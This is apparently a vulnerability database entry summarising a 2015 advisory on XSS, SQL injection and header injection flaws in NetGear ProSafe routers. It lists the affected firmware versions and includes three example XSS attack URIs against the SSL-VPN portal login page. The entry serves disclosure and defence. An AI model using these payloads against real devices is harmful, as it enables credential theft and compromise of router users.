ID

VAR-E-201506-0353


TITLE

Multiple NetGear ProSafe Routers Multiple Security Vulnerabilities

Trust: 0.3

sources: BID: 75422

DESCRIPTION

Multiple NetGear ProSafe routers are prone to multiple security vulnerabilities.
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and to insert a crafted HTTP header into an HTTP response that could cause a web page redirection to a possible malicious website.

Trust: 0.3

sources: BID: 75422

AFFECTED PRODUCTS

vendor:netgearmodel:prosafe srx5308scope:eqversion:4.3.3-3

Trust: 0.3

vendor:netgearmodel:prosafe srx5308scope:eqversion:4.3.2-7

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv3scope:eqversion:4.3.3-3

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv3scope:eqversion:4.3.2-7

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv2scope:eqversion:4.3.3-3

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv2scope:eqversion:4.3.2-7

Trust: 0.3

vendor:netgearmodel:prosafe fvs318nscope:eqversion:4.3.3-3

Trust: 0.3

vendor:netgearmodel:prosafe fvs318nscope:eqversion:4.3.2-7

Trust: 0.3

vendor:netgearmodel:prosafe srx5308scope:neversion:4.3.3-5

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv3scope:neversion:4.3.3-5

Trust: 0.3

vendor:netgearmodel:prosafe fvs336gv2scope:neversion:4.3.3-5

Trust: 0.3

vendor:netgearmodel:prosafe fvs318nscope:neversion:4.3.3-5

Trust: 0.3

sources: BID: 75422

EXPLOIT

Attackers can use a browser to exploit the SQL-injection issue. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issue.
The following example URIs are available:
https://www.example.com/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN";><script>alert("XSS")</script>
https://www.example.com/scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=SSL-VPN";><script>alert("XSS")<%2fscript>&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0
https://www.example.com/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN&stuMsg=Usereb<script>alert("XSS")<%2fscript>

Trust: 0.3

sources: BID: 75422

PRICE

Free

Trust: 0.3

sources: BID: 75422

TYPE

Input Validation Error

Trust: 0.3

sources: BID: 75422

CREDITS

Juan J. Güelfo of Encripto AS

Trust: 0.3

sources: BID: 75422

EXTERNAL IDS

db:BIDid:75422

Trust: 0.3

sources: BID: 75422

REFERENCES

url:http://www.encripto.no/forskning/whitepapers/netgear_prosafe_advisory_june_2015.pdf

Trust: 0.3

url:http://www.netgear.com

Trust: 0.3

sources: BID: 75422

SOURCES

db:BIDid:75422

LAST UPDATE DATE

2022-07-27T09:58:40.240000+00:00


SOURCES UPDATE DATE

db:BIDid:75422date:2015-06-25T00:00:00

SOURCES RELEASE DATE

db:BIDid:75422date:2015-06-25T00:00:00